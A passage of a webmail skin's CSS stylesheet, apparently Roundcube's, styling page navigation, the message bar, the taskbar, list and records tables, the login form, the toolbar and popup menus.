background: -ms-linear-gradient(top, #d8d8d8 0%, #bababa 100%);
background: linear-gradient(top, #d8d8d8 0%, #bababa 100%);
box-shadow: 0 1px 1px 0 #999;
-o-box-shadow: 0 1px 1px 0 #999;
-webkit-box-shadow: 0 1px 1px 0 #999;
-moz-box-shadow: 0 1px 1px 0 #999;
}
.pagenav.dark a.button.pressed {
background: #bababa;
background: -moz-linear-gradient(top, #bababa 0%, #d8d8d8 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#bababa), color-stop(100%,#d8d8d8));
background: -o-linear-gradient(top, #bababa 0%, #d8d8d8 100%);
background: -ms-linear-gradient(top, #bababa 0%, #d8d8d8 100%);
background: linear-gradient(top, #bababa 0%, #d8d8d8 100%);
}
.pagenav a.button {
padding: 1px 3px;
height: 16px;
vertical-align: middle;
margin-bottom: 1px;
}
.pagenav a.button span.inner {
display: inline-block;
width: 16px;
height: 13px;
text-indent: 1000px;
overflow: hidden;
background: url(images/buttons.png) -6px -211px no-repeat;
}
.pagenav a.prevpage span.inner {
background-position: -7px -226px;
}
.pagenav a.nextpage span.inner {
background-position: -28px -226px;
}
.pagenav a.lastpage span.inner {
background-position: -28px -211px;
}
.pagenav a.pageup span.inner {
background-position: -7px -241px;
}
.pagenav a.pagedown span.inner {
background-position: -29px -241px;
}
.pagenav a.reply span.inner {
background-position: -7px -256px;
}
.pagenav a.forward span.inner {
background-position: -29px -256px;
}
.pagenav a.replyall span.inner {
background-position: -7px -271px;
}
.pagenav a.extwin span.inner {
background-position: -29px -271px;
}
.pagenav .countdisplay {
display: inline-block;
padding: 3px 1em 0 1em;
text-shadow: 0px 1px 1px #fff;
min-width: 16em;
}
.pagenavbuttons {
position: relative;
top: -2px;
}
a.iconbutton {
display: inline-block;
width: 24px;
height: 18px;
text-decoration: none;
text-indent: -5000px;
background: url(images/buttons.png) -1000px 0 no-repeat;
}
a.iconbutton.disabled {
opacity: 0.4;
filter: alpha(opacity=40);
cursor: default;
}
a.iconbutton.searchoptions {
background-position: -2px -317px;
}
a.iconbutton.reset {
background-position: -25px -317px;
}
a.iconbutton.cancel {
background-position: -7px -377px;
}
a.iconlink {
display: inline-block;
color: #888;
text-decoration: none;
white-space: nowrap;
padding: 2px 8px 2px 20px;
background: url(images/buttons.png) -1000px 0 no-repeat;
}
a.iconlink:hover {
text-decoration: underline;
}
a.iconlink.delete {
background-position: -7px -337px;
}
a.iconlink.add {
background-position: -7px -357px;
}
a.iconlink.remove {
background-position: -7px -378px;
}
a.iconlink.cancel {
background-position: -7px -397px;
}
a.iconlink.edit {
background-position: -7px -417px;
}
a.iconlink.upload {
background-position: -6px -437px;
}
/*** message bar ***/
#message div.loading,
#message div.warning,
#message div.error,
#message div.notice,
#message div.confirmation,
#message-objects div.notice {
color: #555;
font-weight: bold;
padding: 6px 30px 6px 25px;
display: inline-block;
white-space: nowrap;
background: url(images/messages.png) 0 5px no-repeat;
cursor: default;
}
#message div.warning {
color: #960;
background-position: 0 -86px;
}
#message div.error {
color: #cf2734;
background-position: 0 -55px;
}
#message div.confirmation {
color: #093;
background-position: 0 -25px;
}
#message div.loading {
background: url(images/ajaxloader.gif) 2px 6px no-repeat;
}
#message div a,
#message div span {
padding-right: 0.5em;
text-decoration: none;
}
#message div a:hover {
text-decoration: underline;
cursor: pointer;
}
#message.statusbar {
position: absolute;
bottom: 0;
left: 0;
right: 0;
height: 27px;
padding-left: 8px;
border-top: 1px solid #ddd;
border-radius: 0 0 4px 4px;
background: #eaeaea;
background: -moz-linear-gradient(top, #eaeaea 0%, #c8c8c8 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#eaeaea), color-stop(100%,#c8c8c8));
background: -o-linear-gradient(top, #eaeaea 0%, #c8c8c8 100%);
background: -ms-linear-gradient(top, #eaeaea 0%, #c8c8c8 100%);
background: linear-gradient(top, #eaeaea 0%, #c8c8c8 100%);
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
}
.ui-dialog.error .ui-dialog-title,
.ui-dialog.warning .ui-dialog-title,
.ui-dialog.confirmation .ui-dialog-title {
padding-left: 25px;
background: url(images/messages.png) 0 5px no-repeat;
text-shadow: 0 1px 1px #fff;
}
.ui-dialog.warning .ui-dialog-title {
color: #960;
background-position: 0 -90px;
}
.ui-dialog.error .ui-dialog-title {
color: #cf2734;
background-position: 0 -60px;
}
.ui-dialog.confirmation .ui-dialog-title {
color: #093;
background-position: 0 -30px;
}
.ui-dialog.popupmessage .ui-dialog-titlebar {
padding: 8px 1em 4px 1em;
background: #e3e3e3;
background: -moz-linear-gradient(top, #e3e3e3 0%, #cfcfcf 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#e3e3e3), color-stop(100%,#cfcfcf));
background: -o-linear-gradient(top, #e3e3e3 0%, #cfcfcf 100%);
background: -ms-linear-gradient(top, #e3e3e3 0%, #cfcfcf 100%);
background: linear-gradient(top, #e3e3e3 0%, #cfcfcf 100%);
}
.ui-dialog.popupmessage .ui-widget-content {
font-size: 12px;
background: #eee;
background: -moz-linear-gradient(top, #eee 0%, #dcdcdc 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#eee), color-stop(100%,#dcdcdc));
background: -o-linear-gradient(top, #eee 0%, #dcdcdc 100%);
background: -ms-linear-gradient(top, #eee 0%, #dcdcdc 100%);
background: linear-gradient(top, #eee 0%, #dcdcdc 100%);
}
/*** basic page layout ***/
#header {
overflow-x: hidden; /* Chrome bug #1488851 */
}
#topline {
height: 18px;
background: url(images/linen_header.jpg) repeat #666;
border-bottom: 1px solid #4f4f4f;
padding: 2px 0 2px 10px;
color: #aaa;
text-align: center;
}
#topnav {
position: relative;
height: 46px;
margin-bottom: 10px;
padding: 0 0 0 10px;
background: #111;
background: -moz-linear-gradient(top, #404040 0%, #060606 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#404040), color-stop(100%,#060606));
background: -o-linear-gradient(top, #404040 0%, #060606 100%);
background: -ms-linear-gradient(top, #404040 0%, #060606 100%);
background: linear-gradient(top, #404040 0%, #060606 100%);
}
#topline a,
#topnav a {
color: #eee;
text-decoration: none;
}
#topline a:hover {
text-decoration: underline;
}
#toplogo {
padding-top: 2px;
cursor: pointer;
}
.topleft {
float: left;
}
.topright {
float: right;
}
.closelink {
display: inline-block;
padding: 2px 10px 2px 20px;
}
#topline span.username {
padding-right: 1em;
}
#topline .topleft a {
display: inline-block;
padding: 2px 0.8em 0 0;
color: #aaa;
}
#topline a.button-logout {
display: inline-block;
padding: 2px 10px 2px 20px;
background: url(images/buttons.png) -6px -193px no-repeat;
color: #fff;
}
#taskbar .button-logout {
display: none;
}
#taskbar a.button-logout span.button-inner {
background-position: -2px -1791px;
}
#taskbar a.button-logout:hover span.button-inner {
background-position: -2px -1829px;
}
/*** minimal version of the page header ***/
.minimal #topline {
position: fixed;
top: -18px;
background: #444;
z-index: 5000;
width: 100%;
height: 22px;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
.minimal #topline:hover {
top: 0px;
opacity: 0.94;
filter: alpha(opacity=94);
-webkit-transition: top 0.3s ease-in-out;
-moz-transition: top 0.3s ease-in-out;
-o-transition: top 0.3s ease-in-out;
transition: top 0.3s ease-in-out;
}
.extwin #topline,
.extwin #topline:hover {
position: static;
top: 0px;
height: 18px;
width: auto;
-moz-box-sizing: content-box;
box-sizing: content-box;
opacity: 0.999;
}
.partwin #topline {
position: absolute;
right: 6px;
top: 18px;
width: auto;
z-index: 100;
background: transparent;
background: none;
border: 0;
}
.minimal #topline a.button-logout {
display: none;
}
.minimal #topline span.username {
display: inline-block;
padding-top: 2px;
}
.minimal #topnav {
position: relative;
top: 4px;
height: 42px;
}
.minimal #taskbar a {
position: relative;
padding: 10px 10px 0 6px;
height: 32px;
}
.minimal #taskbar .button-logout {
display: inline-block;
}
.minimal #taskbar .button-inner {
top: -4px;
padding: 0;
height: 24px !important;
width: 27px;
text-indent: -5000px;
}
#taskbar .tooltip {
display: none;
}
.minimal #taskbar .tooltip {
position: absolute;
top: -500px;
right: 2px;
display: inline-block;
padding: 2px 8px 3px 8px;
background: #444;
background: -moz-linear-gradient(top, #444 0%, #333 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#444), color-stop(100%,#333));
background: -o-linear-gradient(top, #444 0%, #333 100%);
background: -ms-linear-gradient(top, #444 0%, #333 100%);
background: linear-gradient(top, #444 0%, #333 100%);
color: #eee;
font-weight: bold;
white-space: nowrap;
border: 1px solid #777;
box-shadow: 0 1px 5px 0 #333;
-moz-box-shadow: 0 1px 5px 0 #333;
-webkit-box-shadow: 0 1px 5px 0 #333;
-o-box-shadow: 0 1px 5px 0 #333;
z-index: 200;
white-space: nowrap;
text-shadow: 0px 1px 1px #000;
}
.minimal #taskbar .tooltip:after {
content: "";
position: absolute;
top: -4px;
right: 15px;
border-style: solid;
border-width: 0 4px 4px;
border-color: #888 transparent;
/* reduce the damage in FF3.0 */
display: block;
width: 0;
z-index: 251;
}
.ie8 .minimal #taskbar .tooltip:after {
top: -6px;
}
.minimal #taskbar a:hover .tooltip {
display: block;
top: 39px;
}
/*** taskbar ***/
#taskbar {
position: relative;
padding-right: 18px;
}
#taskbar a {
display: inline-block;
height: 34px;
padding: 12px 10px 0 6px;
}
#taskbar a span.button-inner {
display: inline-block;
font-size: 110%;
font-weight: normal;
text-shadow: 0px 1px 1px black;
padding: 5px 0 0 34px;
height: 19px;
background: url(images/buttons.png) -1000px 0 no-repeat;
}
#taskbar a.button-selected {
color: #3cf;
background-color: #2c2c2c;
}
#taskbar a.button-mail span.button-inner {
background-position: 0 2px;
}
#taskbar a.button-mail:hover span.button-inner,
#taskbar a.button-mail.button-selected span.button-inner {
background-position: 0 -22px;
}
#taskbar a.button-addressbook span.button-inner {
background-position: 0 -48px;
}
#taskbar a.button-addressbook:hover span.button-inner,
#taskbar a.button-addressbook.button-selected span.button-inner {
background-position: 0 -72px;
}
#taskbar a.button-settings span.button-inner {
background-position: 0 -96px;
}
#taskbar a.button-settings:hover span.button-inner,
#taskbar a.button-settings.button-selected span.button-inner {
background-position: 0 -120px;
}
#taskbar a.button-calendar span.button-inner {
background-position: 0 -144px;
}
#taskbar a.button-calendar:hover span.button-inner,
#taskbar a.button-calendar.button-selected span.button-inner {
background-position: 0 -168px;
}
#taskbar .minmodetoggle {
position: absolute;
top: 0;
right: 0;
display: block;
width: 19px;
height: 46px;
cursor: pointer;
background: url(images/buttons.png) -35px -1778px no-repeat;
}
.minimal #taskbar .minmodetoggle {
height: 42px;
background-position: -35px -1820px;
}
#mainscreen {
position: absolute;
top: 88px;
left: 10px;
right: 10px;
bottom: 20px;
}
.minimal #mainscreen {
top: 62px;
}
.minimal #mainscreen.offset {
top: 102px;
}
.partwin #mainscreen {
top: 60px
}
.extwin #mainscreen {
top: 40px;
}
#mainscreen.offset {
top: 132px;
}
#mainscreen .offset {
margin-top: 42px;
}
.uibox {
border: 1px solid #a3a3a3;
border-radius: 4px;
overflow: hidden;
box-shadow: 0 0 2px #999;
-o-box-shadow: 0 0 2px #999;
-webkit-box-shadow: 0 0 2px #999;
-moz-box-shadow: 0 0 2px #999;
background: #fff;
}
.minwidth {
position: absolute;
top: 0;
left: 0;
bottom: 0;
width: 100%;
min-width: 1024px;
}
.scroller {
overflow: auto;
}
.readtext {
width: 42em;
padding: 12px;
font-size: 12px;
}
.readtext > h1,
.readtext > h2,
.readtext > h3 {
margin-top: 0;
}
.watermark {
background-image: url(images/watermark.jpg);
background-position: center;
background-repeat: no-repeat;
}
/*** lists ***/
.listbox {
background: #d9ecf4;
overflow: hidden;
}
.listbox .scroller {
position: absolute;
top: 0;
left: 0;
width: 100%;
bottom: 0;
overflow-x: hidden;
overflow-y: auto;
}
.listbox .scroller.withfooter {
bottom: 42px;
}
.listbox .boxtitle + .scroller {
top: 34px;
}
.boxtitle,
.uibox .listing thead td {
font-size: 12px;
font-weight: bold;
padding: 10px 8px 3px 8px;
height: 20px; /* doesn't affect table-cells in FF */
margin: 0;
text-shadow: 0px 1px 1px #fff;
border-bottom: 1px solid #bbd3da;
white-space: nowrap;
}
.uibox .listing thead td {
padding-bottom: 8px;
height: auto;
}
.uibox .boxtitle,
.uibox .listing thead td {
background: #b0ccd7;
color: #004458;
border-radius: 4px 4px 0 0;
}
.listbox .listitem,
.listbox .tablink,
.listing tbody td,
.listing li {
display: block;
border-top: 1px solid #fff;
border-bottom: 1px solid #bbd3da;
cursor: default;
font-weight: normal;
}
.listbox .listitem a,
.listbox .tablink a,
.listing tbody td,
.listing li a {
display: block;
color: #376572;
text-shadow: 0px 1px 1px #fff;
text-decoration: none;
cursor: default;
padding: 6px 8px 2px 8px;
height: 17px; /* doesn't affect table-cells in FF */
white-space: nowrap;
}
.listing tbody td {
display: table-cell;
padding-bottom: 5px;
height: auto;
min-height: 14px;
}
.webkit .listing tbody td {
height: 14px;
}
.listbox .listitem.selected,
.listbox .tablink.selected,
.listbox .listitem.selected > a,
.listbox .tablink.selected > a,
.listing tbody tr.unfocused td,
.listing tbody tr.selected td,
.listing li.selected,
.listing li.selected > a {
color: #004458;
font-weight: bold;
background-color: #c7e3ef;
}
ul.listing {
display: block;
list-style: none;
margin: 0;
padding: 0;
}
ul.listing li {
background-color: #d9ecf4;
}
ul.listing li.droptarget,
table.listing tr.droptarget td {
background-color: #e8e798;
}
table.listing,
table.layout {
border: 0;
width: 100%;
border-spacing: 0;
}
table.layout td {
vertical-align: top;
}
.listbox .boxfooter {
position: absolute;
bottom: 0;
left: 0;
width: 100%;
height: 42px;
border-top: 1px solid #ccdde4;
background: #d9ecf4;
-webkit-box-shadow: inset 0 1px 0 0 #fff;
-moz-box-shadow: inset 0 1px 0 0 #fff;
box-shadow: inset 0 1px 0 0 #fff;
white-space: nowrap;
overflow: hidden;
}
.uibox .boxfooter {
border-radius: 0 0 4px 4px;
}
.boxfooter .listbutton {
display: inline-block;
text-decoration: none;
width: 48px;
border-right: 1px solid #fff;
background: #c7e3ef;
padding: 3px 0;
margin-top: 1px;
}
.uibox .boxfooter .listbutton:first-child {
border-radius: 0 0 0 4px;
}
.boxfooter .listbutton .inner {
display: inline-block;
width: 48px;
height: 35px;
text-indent: -5000px;
background: url(images/buttons.png) -1000px 0 no-repeat;
}
.boxfooter .listbutton.add .inner {
background-position: 10px -1301px;
}
.boxfooter .listbutton.delete .inner {
background-position: 10px -1342px;
}
.boxfooter .listbutton.groupactions .inner {
background-position: 5px -1382px;
}
.boxfooter .listbutton.addto .inner {
background-position: 5px -1422px;
}
.boxfooter .listbutton.addcc .inner {
background-position: 5px -1462px;
}
.boxfooter .listbutton.addbcc {
width: 54px;
}
.boxfooter .listbutton.addbcc .inner {
width: 54px;
background-position: 2px -1502px;
}
.boxfooter .listbutton.removegroup .inner {
background-position: 5px -1540px;
}
.boxfooter .listbutton.disabled .inner {
opacity: 0.4;
filter: alpha(opacity=40);
}
.boxfooter .countdisplay {
display: inline-block;
position: relative;
top: 10px;
color: #69929e;
padding: 3px 6px;
}
.boxpagenav {
position: absolute;
top: 10px;
right: 6px;
width: auto;
}
.boxpagenav a.icon {
display: inline-block;
padding: 1px 3px;
height: 13px;
width: 14px;
text-indent: 1000px;
vertical-align: bottom;
overflow: hidden;
background: url(images/buttons.png) -4px -286px no-repeat;
}
.boxpagenav a.icon.prevpage {
background-position: -4px -301px;
}
.boxpagenav a.icon.nextpage {
background-position: -28px -301px;
}
.boxpagenav a.icon.lastpage {
background-position: -28px -286px;
}
.boxpagenav a.icon.disabled {
opacity: 0.4;
filter: alpha(opacity=40);
}
.centerbox {
width: 40em;
margin: 16px auto;
}
.errorbox {
width: 40em;
padding: 20px;
}
.errorbox h3 {
font-size: 16px;
margin-top: 0;
}
/*** Records table ***/
table.records-table {
display: table;
width: 100%;
table-layout: fixed;
border-collapse: collapse;
border-spacing: 0;
border: 1px solid #bbd3da;
}
.boxlistcontent .records-table {
border: 0;
}
.records-table thead td {
color: #69939e;
font-size: 11px;
font-weight: bold;
background: #d6eaf3;
background: -moz-linear-gradient(left, #e3f2f6 0, #d6eaf3 14px, #d6eaf3 100%);
background: -webkit-gradient(linear, left top, right top, color-stop(0,#e3f2f6), color-stop(8%,#d6eaf3), color-stop(100%,#d6eaf3));
background: -o-linear-gradient(left, #e3f2f6 0, #d6eaf3 14px, #d6eaf3 100%);
background: -ms-linear-gradient(left, #e3f2f6 0, #d6eaf3 14px ,#d6eaf3 100%);
background: linear-gradient(left, #e3f2f6 0, #d6eaf3 14px, #d6eaf3 100%);
border-left: 1px solid #bbd3da;
padding: 8px 7px;
overflow: hidden;
text-overflow: ellipsis;
}
.records-table.sortheader thead td {
padding: 0;
}
.records-table thead td a,
.records-table thead td span {
display: block;
padding: 7px 7px;
color: #69939e;
text-decoration: none;
overflow: hidden;
text-overflow: ellipsis;
}
.records-table tbody td {
padding: 2px 7px;
border-bottom: 1px solid #ddd;
border-left: 1px dotted #bbd3da;
white-space: nowrap;
cursor: default;
overflow: hidden;
text-overflow: ellipsis;
background-color: #fff;
}
.records-table thead tr td:first-child,
.records-table tbody tr td:first-child {
border-left: 0;
}
.records-table tr.selected td {
color: #fff !important;
background: #019bc6;
background: -moz-linear-gradient(top, #019bc6 0%, #017cb4 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#019bc6), color-stop(100%,#017cb4));
background: -o-linear-gradient(top, #019bc6 0%, #017cb4 100%);
background: -ms-linear-gradient(top, #019bc6 0%, #017cb4 100%);
background: linear-gradient(top, #019bc6 0%, #017cb4 100%);
}
.records-table tr.selected td a,
.records-table tr.selected td span {
color: #fff !important;
}
.records-table tr.unfocused td {
color: #fff !important;
background: #4db0d2 !important;
}
.records-table tr.unfocused td a,
.records-table tr.unfocused td span {
color: #fff !important;
}
.records-table tr.deleted td,
.records-table tr.deleted td a {
color: #ccc !important;
}
/*** iFrames ***/
#aboutframe {
width: 97%;
height: 100%;
border: 0;
padding: 0;
}
body.iframe {
background: #fff;
margin: 38px 0 10px 0;
}
body.iframe.error {
background: #ededed;
}
body.iframe.floatingbuttons {
margin-bottom: 40px;
}
body.iframe.fullheight {
margin: 0;
}
.contentbox .boxtitle,
body.iframe .boxtitle {
color: #777;
background: #eee;
background: -moz-linear-gradient(top, #eee 0%, #dfdfdf 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#eee), color-stop(100%,#dfdfdf));
background: -o-linear-gradient(top, #eee 0%, #dfdfdf 100%);
background: -ms-linear-gradient(top, #eee 0%, #dfdfdf 100%);
background: linear-gradient(top, #eee 0%, #dfdfdf 100%);
border-bottom: 1px solid #ccc;
}
body.iframe .boxtitle {
position: fixed;
top: 0;
left: 0;
width: 100%;
z-index: 100;
}
body.iframe .footerleft.floating,
#composeview-bottom .formbuttons.floating {
position: fixed;
left: 0;
bottom: 0;
width: 100%;
z-index: 110;
background: #fff;
padding-top: 8px;
padding-bottom: 12px;
}
body.iframe .footerleft.floating:before,
#composeview-bottom .formbuttons.floating:before {
content: " ";
position: absolute;
top: -6px;
left: 0;
width: 100%;
height: 6px;
background: url(images/overflowshadow.png) top center no-repeat;
}
.boxcontent {
padding: 10px;
}
.contentbox .scroller {
position: absolute;
top: 34px;
left: 0;
right: 0;
bottom: 28px;
overflow: auto;
}
.iframebox {
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 28px;
}
.footerleft {
padding: 0 12px 4px 12px;
}
.propform fieldset {
margin-bottom: 20px;
border: 0;
padding: 0;
}
.propform fieldset legend {
display: block;
font-size: 14px;
font-weight: bold;
padding-bottom: 10px;
margin-bottom: 0;
}
.propform fieldset fieldset legend {
color: #666;
font-size: 12px;
}
fieldset.floating {
float: left;
margin-right: 10px;
margin-bottom: 10px;
}
table.propform {
width: 100%;
border-spacing: 0;
border-collapse: collapse;
}
ul.proplist li,
table.propform td {
width: 80%;
padding: 4px 10px;
background: #eee;
border-bottom: 2px solid #fff;
}
table.propform td.title {
width: 20%;
color: #333;
padding-right: 20px;
white-space: nowrap;
}
table.propform .mceLayout td {
padding: 0;
border-bottom: 0;
}
ul.proplist {
list-style: none;
margin: 0;
padding: 0;
}
ul.proplist li {
width: auto;
}
#pluginbody {
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
}
/*** Login form ***/
#login-form {
position: relative;
width: 580px;
margin: 20ex auto 2ex auto;
}
#login-form .box-inner {
width: 430px;
background: url(images/linen_login.jpg) top left no-repeat #5c5c5c;
margin: 0 50px;
padding: 10px 24px 24px 24px;
border: 1px solid #333;
border-radius: 5px;
box-shadow: inset 0 0 1px #ccc;
-o-box-shadow: inset 0 0 1px #ccc;
-webkit-box-shadow: inset 0 0 1px #ccc;
-moz-box-shadow: inset 0 0 1px #ccc;
}
#login-form .box-bottom {
background: url(images/login_shadow.png) top center no-repeat;
margin-top: -3px;
padding-top: 10px;
}
#login-form .noscriptwarning {
margin: 0 auto;
width: 430px;
color: #cf2734;
font-size: 110%;
font-weight: bold;
}
#login-form td.input {
width: 80%;
padding: 8px;
}
#login-form input[type="text"],
#login-form input[type="password"] {
width: 100%;
border-color: #666;
}
#login-form input.button {
color: #444;
text-shadow: 0px 1px 1px #fff;
border-color: #f9f9f9;
background: #f9f9f9;
background: -moz-linear-gradient(top, #f9f9f9 0%, #e2e2e2 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f9f9f9), color-stop(100%,#e2e2e2));
background: -o-linear-gradient(top, #f9f9f9 0%, #e2e2e2 100%);
background: -ms-linear-gradient(top, #f9f9f9 0%, #e2e2e2 100%);
background: linear-gradient(top, #f9f9f9 0%, #e2e2e2 100%);
box-shadow: inset 0 1px 0 0 #fff;
-moz-box-shadow: inset 0 1px 0 0 #fff;
-webkit-box-shadow: inset 0 1px 0 0 #fff;
-o-box-shadow: inset 0 1px 0 0 #fff;
}
#login-form input.button:hover,
#login-form input.button:focus {
box-shadow: 0 0 5px 2px rgba(71,135,177, 0.9), inset 0 1px 0 0 #fff;
-moz-box-shadow: 0 0 5px 2px rgba(71,135,177, 0.9), inset 0 1px 0 0 #fff;
-webkit-box-shadow: 0 0 5px 2px rgba(71,135,177, 0.9), inset 0 1px 0 0 #fff;
-o-box-shadow: 0 0 5px 2px rgba(71,135,177, 0.9), inset 0 1px 0 0 #fff;
}
#login-form input.button:active {
color: #333;
background: -moz-linear-gradient(top, #dcdcdc 0%, #f9f9f9 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#dcdcdc), color-stop(100%,#f9f9f9));
background: -o-linear-gradient(top, #dcdcdc 0%, #f9f9f9 100%);
background: -ms-linear-gradient(top, #dcdcdc 0%, #f9f9f9 100%);
background: linear-gradient(top, #dcdcdc 0%, #f9f9f9 100%);
}
#login-form form table {
width: 98%;
}
#login-form td.title {
width: 20%;
white-space: nowrap;
color: #cecece;
text-shadow: 0px 1px 1px black;
text-align: right;
padding-right: 1em;
}
#login-form p.formbuttons {
margin-top: 2em;
text-align: center;
}
#login-form #logo {
margin-bottom: 20px;
}
#login-form #message {
min-height: 40px;
padding: 5px 25px;
text-align: center;
}
#login-form #message div {
display: inline-block;
padding-right: 0;
}
#bottomline {
font-size: 90%;
text-align: center;
margin-top: 2em;
}
/*** quicksearch **/
.searchbox {
position: relative;
}
#quicksearchbar {
position: absolute;
right: 1px;
top: 2px;
width: 240px;
}
.searchbox input,
#quicksearchbar input {
width: 176px;
margin: 0;
padding: 3px 30px 3px 34px;
height: 18px;
background: #f1f1f1;
border-color: #ababab;
font-weight: bold;
font-size: 11px;
}
.searchbox #searchmenulink,
#quicksearchbar #searchmenulink {
position: absolute;
top: 5px;
left: 6px;
}
.searchbox #searchreset,
#quicksearchbar #searchreset {
position: absolute;
top: 4px;
right: 1px;
}
/*** toolbar ***/
.toolbar .spacer {
display: inline-block;
width: 24px;
height: 40px;
padding: 0;
}
.toolbar a.button {
text-align: center;
font-size: 10px;
color: #555;
min-width: 50px;
max-width: 75px;
height: 13px;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
padding: 28px 2px 0 2px;
text-shadow: 0px 1px 1px #eee;
box-shadow: none;
-moz-box-shadow: none;
-webkit-box-shadow: none;
-o-box-shadow: none;
background: url(images/buttons.png) -100px 0 no-repeat transparent;
border: 0;
}
.toolbar a.button.disabled {
opacity: 0.4;
filter: alpha(opacity=40);
}
.dropbutton {
display: inline-block;
position: relative;
}
.dropbutton .dropbuttontip {
display: block;
position: absolute;
right: 0;
top: 0;
height: 42px;
width: 18px;
background: url(images/buttons.png) 0 -1255px no-repeat;
cursor: pointer;
}
.dropbutton .dropbuttontip:hover {
background-position: -26px -1255px;
}
.dropbutton a.button.disabled + .dropbuttontip {
opacity: 0.5;
filter: alpha(opacity=50);
}
.dropbutton a.button.disabled + .dropbuttontip:hover {
background-position: 0 -1255px;
}
.dropbutton a.button {
margin-left: 0;
padding-left: 0;
margin-right: 0;
padding-right: 0;
}
.toolbar a.button.back {
background-position: 0 -1216px;
}
.toolbar a.button.checkmail {
background-position: center -1176px;
}
.toolbar a.button.compose {
background-position: center -530px;
}
.toolbar a.button.reply {
background-position: center -570px;
}
.toolbar a.button.reply-all {
min-width: 64px;
background-position: left -610px;
}
.toolbar a.button.forward {
min-width: 64px;
background-position: left -650px;
}
.toolbar a.button.delete {
background-position: center -690px;
}
.toolbar a.button.archive {
background-position: center -730px;
}
.toolbar a.button.junk {
background-position: center -770px;
}
.toolbar a.button.print {
background-position: center -810px;
}
.toolbar a.button.markmessage {
background-position: center -1094px;
}
.toolbar a.button.more {
background-position: center -850px;
}
.toolbar a.button.attach {
background-position: center -890px;
}
.toolbar a.button.spellcheck {
min-width: 64px;
background-position: left -930px;
}
.toolbar a.button.spellcheck.selected {
background-position: left -1620px;
color: #1978a1;
}
.toolbar a.button.insertsig {
background-position: center -1135px;
}
.toolbar a.button.search {
background-position: center -970px;
}
.toolbar a.button.import {
background-position: center -1012px;
}
.toolbar a.button.export {
background-position: center -1054px;
}
.toolbar a.button.send {
background-position: center -1660px;
}
.toolbar a.button.savedraft {
background-position: center -1700px;
}
.toolbar a.button.close {
background-position: 0 -1745px;
}
a.menuselector {
display: inline-block;
border: 1px solid #ababab;
border-radius: 4px;
background: #f8f8f8;
background: -moz-linear-gradient(top, #f8f8f8 0%, #dddddd 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f8f8f8), color-stop(100%,#dddddd));
background: -o-linear-gradient(top, #f8f8f8 0%, #dddddd 100%);
background: -ms-linear-gradient(top, #f9f9f9 0%, #dddddd 100%);
background: linear-gradient(top, #f8f8f8 0%, #dddddd 100%);
text-decoration: none;
color: #333;
cursor: pointer;
white-space: nowrap;
}
a.menuselector .handle {
display: inline-block;
padding: 0 32px 0 6px;
height: 20px;
line-height: 19px;
text-shadow: 0px 1px 1px #fff;
background: url(images/selector.png) right center no-repeat;
border-radius: 4px;
}
a.menuselector:active {
background: #dddddd;
background: -moz-linear-gradient(top, #dddddd 0%, #f8f8f8 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#dddddd), color-stop(100%,#f8f8f8));
background: -o-linear-gradient(top, #dddddd 0%, #f8f8f8 100%);
background: -ms-linear-gradient(top, #dddddd 0%, #f8f8f8 100%);
background: linear-gradient(top, #dddddd 0%, #f8f8f8 100%);
text-decoration: none;
}
select.decorated {
position: relative;
z-index: 10;
opacity: 0;
height: 22px;
cursor: pointer;
filter: alpha(opacity=0);
-khtml-appearance: none;
-webkit-appearance: none;
}
html.opera select.decorated {
opacity: 1;
}
select.decorated option {
color: #fff;
background: #444;
border: 0;
border-top: 1px solid #5a5a5a;
border-bottom: 1px solid #333;
text-shadow: 0px 1px 1px #333;
padding: 4px 6px;
outline: none;
}
/*** quota indicator ***/
#quotadisplay {
left: 6px;
font-size: 12px;
font-weight: bold;
text-shadow: 0px 1px 1px #fff;
padding-left: 30px;
height: 18px;
background: url(images/quota.png) -100px 0 no-repeat;
}
/*** popup menus ***/
.popupmenu,
#rcmKSearchpane {
display: none;
position: absolute;
top: 32px;
left: 90px;
width: auto;
background: #444;
border: 1px solid #999;
z-index: 240;
border-radius: 4px;
box-shadow: 0 2px 6px 0 #333;
-moz-box-shadow: 0 2px 6px 0 #333;
-webkit-box-shadow: 0 2px 6px 0 #333;
-o-box-shadow: 0 2px 6px 0 #333;
}
.popupmenu.dropdown {
border-radius: 0 0 4px 4px;
border-top: 0;
}
ul.toolbarmenu,
#rcmKSearchpane ul {
margin: 0;
padding: 0;
list-style: none;
}
.googie_list td,
ul.toolbarmenu li,
#rcmKSearchpane ul li {
color: #fff;
white-space: nowrap;
min-width: 130px;
margin: 0;
border-top: 1px solid #5a5a5a;
border-bottom: 1px solid #333;
}
.googie_list tr:first-child td,
ul.toolbarmenu li:first-child,
select.decorated option:first-child {
border-top: 0;
}
.googie_list tr:last-child td,
ul.toolbarmenu li:last-child,
select.decorated option:last-child {
border-bottom: 0;
}
.googie_list td span,
ul.toolbarmenu li a {
display: block;
color: #666;
text-shadow: 0px 1px 1px #333;
text-decoration: none;
min-height: 14px;
padding: 6px 10px 6px 10px;
}
.googie_list td span {
padding: 3px 10px;
}
.googie_list td span,
ul.toolbarmenu li a.active {
color: #fff;
cursor: default;
}
.googie_list td.googie_list_onhover,
ul.toolbarmenu li a.active:hover,
#rcmKSearchpane ul li.selected,
select.decorated option:hover,
select.decorated option[selected='selected'] {
background-color: #00aad6;
background: -moz-linear-gradient(top, #00aad6 0%, #008fc9 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#00aad6), color-stop(100%,#008fc9));
background: -o-linear-gradient(top, #00aad6 0%, #008fc9 100%);
